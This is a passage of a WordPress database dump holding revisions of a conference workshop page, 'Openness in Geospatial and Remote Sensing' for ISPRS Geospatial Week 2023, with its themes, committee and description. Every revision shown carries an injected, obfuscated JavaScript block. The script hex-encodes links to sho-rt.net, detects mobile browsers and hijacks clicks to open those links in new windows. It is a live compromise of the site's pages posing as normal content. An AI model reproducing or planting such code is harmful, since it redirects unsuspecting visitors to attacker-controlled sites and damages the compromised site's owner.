_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:13:06','2023-01-01 19:13:06','',3497,'https://gsw2023.com/?p=3518',0,'revision','',0),
(3519,1,'2023-01-01 19:14:02','2023-01-01 19:14:02','<p>[vc_row][vc_column][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:14:02','2023-01-01 19:14:02','',3497,'https://gsw2023.com/?p=3519',0,'revision','',0),
(3520,1,'2023-01-01 19:23:55','2023-01-01 19:23:55','<p>[vc_row][vc_column][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 